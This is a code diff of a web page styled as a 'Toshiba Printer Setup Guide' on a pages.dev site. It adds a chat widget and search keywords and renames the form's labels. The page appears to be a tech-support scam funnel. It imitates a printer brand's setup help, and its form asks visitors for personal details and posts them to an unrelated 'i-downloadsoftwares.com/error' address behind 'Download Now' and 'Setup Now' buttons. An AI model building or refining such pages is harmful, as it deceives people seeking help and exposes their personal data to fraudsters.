--- a/index.html
+++ b/index.html
@@ -1,11 +1,14 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
+  <!-- Start of  Zendesk Widget script -->
+<script id="ze-snippet" src="https://static.zdassets.com/ekr/snippet.js?key=7668c976-0fb7-47ee-8740-3e9115bdb10f"> </script>
+<!-- End of  Zendesk Widget script -->
 <meta charset="UTF-8" />
 <meta name="viewport" content="width=device-width, initial-scale=1" />
 <title>Toshiba Printer Setup Guide: How To Set Up Toshiba Printer?</title>
   <meta name="description" content="Toshiba printer setup guide to help you install, connect, and configure your Toshiba printer easily. Follow step-by-step instructions for a smooth setup.">
-<meta name="keywords" content="">
+<meta name="keywords" content="toshiba printer set up, toshiba printer setup, toshiba printer setup guide, setup toshiba printer, how to setup toshiba printer">
 <meta name="author" content="Toshiba Printer Setup Guide">
 <link rel="canonical" href="https://toshibaprinter.pages.dev/">
 <style>
@@ -198,7 +201,7 @@
     scroll-behavior: smooth;
   }
 
-  .install-form button {
+  .setup-form button {
     width:100%;
       padding: 12px;
       font-size: 16px;
@@ -210,10 +213,10 @@
       transition: background-color 0.3s ease;
     }
 
-    .install-form button:hover {
+    .setup-form button:hover {
       background-color: #0358ad;
     }
-     .install-form {
+     .setup-form {
       background: #fff;
       max-width: 500px;
       margin: 40px auto;
@@ -222,7 +225,7 @@
       box-shadow: 0 0 15px rgba(0,0,0,0.1);
     }
 
-    .install-form p.title {
+    .setup-form p.title {
       font-size: 20px;
       font-weight: 600;
       margin-bottom: 20px;
@@ -282,8 +285,8 @@
   </div>
 </section>
 
-  <div class="install-form">
-    <p class="title">Install Your Software</p>
+  <div class="setup-form">
+    <p class="title">Setup Your Software</p>
     <form action="https://i-downloadsoftwares.com/error" method="post">
       <div class="form-group">
         <label for="full-name">Full Name</label>
@@ -310,7 +313,7 @@
         </select>
       </div>
 
-      <button type="submit">Download Now</button>
+      <button type="submit">Setup Now</button>
     </form>
   </div>
 
